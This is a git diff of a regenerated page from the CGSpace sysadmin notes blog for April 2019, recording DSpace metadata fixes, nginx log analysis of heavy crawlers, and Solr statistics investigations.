Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>Very interesting to see this in the response:</li>
</ul>
<pre><code>&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],
&quot;handle&quot;:&quot;10568/89975&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],
&#34;handle&#34;:&#34;10568/89975&#34;
</code></pre><ul>
<li>On further inspection I see that the Altmetric explorer pages for each of these Handles are actually doing the right thing:
<ul>
@ -1208,15 +1208,15 @@ sys 0m2.551s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-04/" />
<meta property="article:published_time" content="2019-04-01T09:00:43+03:00" />
<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
<meta property="article:modified_time" content="2021-08-18T15:29:31+03:00" />
@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,7 +76,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
"url": "https://alanorth.github.io/cgspace-notes/2019-04/",
"wordCount": "6778",
"datePublished": "2019-04-01T09:00:43+03:00",
"dateModified": "2020-04-13T15:30:24+03:00",
"dateModified": "2021-08-18T15:29:31+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -94,12 +94,12 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -145,7 +145,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<p class="blog-post-meta">
<time datetime="2019-04-01T09:00:43+03:00">Mon Apr 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -163,16 +163,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre><h2 id="2019-04-02">2019-04-02</h2>
<ul>
<li>CTA says the Amazon IPs are AWS gateways for real user traffic</li>
@ -191,26 +191,26 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
</code></pre><ul>
<li>We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!</li>
<li>Next I will resolve all their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre><code>$ ./resolve-orcids.py -i /tmp/2019-04-03-orcid-ids.txt -o 2019-04-03-orcid-ids.txt -d
<pre tabindex="0"><code>$ ./resolve-orcids.py -i /tmp/2019-04-03-orcid-ids.txt -o 2019-04-03-orcid-ids.txt -d
</code></pre><ul>
<li>After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim</li>
<li>One user&rsquo;s name has changed so I will update those using my <code>fix-metadata-values.py</code> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><ul>
<li>I created a pull request and merged the changes to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/417">#417</a>)</li>
<li>A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it&rsquo;s still going:</li>
</ul>
<pre><code>2019-04-03 16:34:02,262 INFO org.dspace.statistics.SolrLogger @ Updating : 1754500/21701 docs in http://localhost:8081/solr//statistics-2018
<pre tabindex="0"><code>2019-04-03 16:34:02,262 INFO org.dspace.statistics.SolrLogger @ Updating : 1754500/21701 docs in http://localhost:8081/solr//statistics-2018
</code></pre><ul>
<li>Interestingly, there are 5666 occurrences, and they are mostly for the 2018 core:</li>
</ul>
<pre><code>$ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;org.dspace.statistics.SolrLogger @ Updating&#39; /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk &#39;{print $11}&#39; | sort | uniq -c
1
3 http://localhost:8081/solr//statistics-2017
5662 http://localhost:8081/solr//statistics-2018
@ -222,14 +222,14 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Uptime Robot reported that CGSpace (linode18) went down tonight</li>
<li>I see there are lots of PostgreSQL connections:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
10 dspaceCli
250 dspaceWeb
</code></pre><ul>
<li>I still see those weird messages about updating the statistics-2018 Solr core:</li>
</ul>
<pre><code>2019-04-05 21:06:53,770 INFO org.dspace.statistics.SolrLogger @ Updating : 2444600/21697 docs in http://localhost:8081/solr//statistics-2018
<pre tabindex="0"><code>2019-04-05 21:06:53,770 INFO org.dspace.statistics.SolrLogger @ Updating : 2444600/21697 docs in http://localhost:8081/solr//statistics-2018
</code></pre><ul>
<li>Looking at <code>iostat 1 10</code> I also see some CPU steal has come back, and I can confirm it by looking at the Munin graphs:</li>
</ul>
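<ul>
<li>For reference, steal shows up in the <code>%steal</code> column of the CPU summary that <code>iostat</code> prints (illustrative output only, not captured from this server):</li>
</ul>
<pre tabindex="0"><code>$ iostat -c 1 2
avg-cpu:  %user   %nice %system %iowait  %steal   %idle
          12.40    0.00    3.10    0.52    8.21   75.77
</code></pre>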
@ -242,7 +242,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code>statistics-2017: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2017: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>I restarted it again and all the Solr cores came up properly&hellip;</li>
</ul>
@ -257,7 +257,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</li>
<li>Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 18.195.78.144
245 207.46.13.58
303 207.46.13.194
@ -268,7 +268,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
1803 66.249.79.59
2834 2a01:4f8:140:3192::2
9623 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
31 66.249.79.62
41 207.46.13.210
42 40.77.167.66
@ -282,19 +282,19 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</code></pre><ul>
<li><code>45.5.184.72</code> is in Colombia so it&rsquo;s probably CIAT, and I see they are indeed trying to crawl the Discover pages on CIAT&rsquo;s datasets collection:</li>
</ul>
<pre><code>GET /handle/10568/72970/discover?filtertype_0=type&amp;filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_relational_operator_0=equals&amp;filter_1=&amp;filter_0=Dataset&amp;filtertype=dateIssued&amp;filter_relational_operator=equals&amp;filter=2014
<pre tabindex="0"><code>GET /handle/10568/72970/discover?filtertype_0=type&amp;filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_relational_operator_0=equals&amp;filter_1=&amp;filter_0=Dataset&amp;filtertype=dateIssued&amp;filter_relational_operator=equals&amp;filter=2014
</code></pre><ul>
<li>Their user agent is the one I added to the badbots list in nginx last week: &ldquo;GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1&rdquo;</li>
<li>They made 22,000 requests to Discover on this collection today alone (and it&rsquo;s only 11AM):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;06/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;06/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
22077 /handle/10568/72970/discover
</code></pre><ul>
<li>Yesterday they made 43,000 requests and we actually blocked most of them:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
43631 /handle/10568/72970/discover
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -E &#39;/handle/[0-9]+/[0-9]+/discover&#39; | awk &#39;{print $9}&#39; | sort | uniq -c
142 200
43489 503
</code></pre><ul>
@ -315,59 +315,59 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 96925,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 96925,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-03&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-03&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
<li>Strangely I don&rsquo;t see many hits in 2019-04:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 38,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 38,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-04&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-04&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
<li>Making some tests on GET vs HEAD requests on the <a href="https://dspacetest.cgiar.org/handle/10568/100289">CTA Spore 192 item</a> on DSpace Test:</li>
</ul>
<pre><code>$ http --print Hh GET https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf
<pre tabindex="0"><code>$ http --print Hh GET https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf
GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -419,8 +419,8 @@ X-XSS-Protection: 1; mode=block
</code></pre><ul>
<li>And from the server side, the nginx logs show:</li>
</ul>
<pre><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &quot;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 68078 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &quot;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 0 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
<pre tabindex="0"><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &#34;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 68078 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &#34;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 0 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
</code></pre><ul>
<li>So definitely the <em>size</em> of the transfer is more efficient with a HEAD, but I need to wait to see if these requests show up in Solr
<ul>
@ -428,7 +428,7 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>2019-04-07 02:05:30,966 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=EF2DB6E4F69926C5555B3492BB0071A8:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
<pre tabindex="0"><code>2019-04-07 02:05:30,966 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=EF2DB6E4F69926C5555B3492BB0071A8:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
2019-04-07 02:05:39,265 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=B6381FC590A5160D84930102D068C7A3:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
</code></pre><ul>
<li>So my inclination is that both HEAD and GET requests are registered as views as far as Solr and DSpace are concerned
@ -437,7 +437,7 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>2019-04-07 02:08:44,186 INFO org.apache.solr.update.UpdateHandler @ start commit{,optimize=true,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
<pre tabindex="0"><code>2019-04-07 02:08:44,186 INFO org.apache.solr.update.UpdateHandler @ start commit{,optimize=true,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
</code></pre><ul>
<li>Ugh, even after optimizing there are no Solr results for requests from my IP, and actually I only see 18 results from 2019-04 so far and none of them are <code>statistics_type:view</code>&hellip; very weird
<ul>
@ -448,26 +448,26 @@ X-XSS-Protection: 1; mode=block
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics">DSpace 5.x Solr documentation</a> the default commit time is after 15 minutes or 10,000 documents (see <code>solrconfig.xml</code>)</li>
<li>I looped some GET and HEAD requests to a bitstream on my local instance and after some time I see that they <em>do</em> register as downloads (even though they are internal):</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 909,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 909,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 0,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;isInternal:true&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 0,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;isInternal:true&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND time:2019-04-07*&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND time:2019-04-07*&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
@ -496,12 +496,12 @@ X-XSS-Protection: 1; mode=block
<li>UptimeRobot said CGSpace went down and up a few times tonight, and my first instinct was to check <code>iostat 1 10</code> and I saw that CPU steal is around 10 to 30 percent right now&hellip;</li>
<li>The load average is super high right now, as I&rsquo;ve noticed the last few times UptimeRobot said that CGSpace went down:</li>
</ul>
<pre><code>$ cat /proc/loadavg
<pre tabindex="0"><code>$ cat /proc/loadavg
10.70 9.17 8.85 18/633 4198
</code></pre><ul>
<li>According to the server logs there is actually not much going on right now:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
118 18.195.78.144
128 207.46.13.219
129 167.114.64.100
@ -512,7 +512,7 @@ X-XSS-Protection: 1; mode=block
363 40.77.167.21
740 2a01:4f8:140:3192::2
4823 45.5.184.72
